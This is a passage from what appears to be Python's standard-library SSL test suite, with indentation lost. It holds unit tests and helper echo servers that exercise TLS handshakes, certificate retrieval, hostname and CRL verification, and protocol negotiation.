ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ConnectionResetError:
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
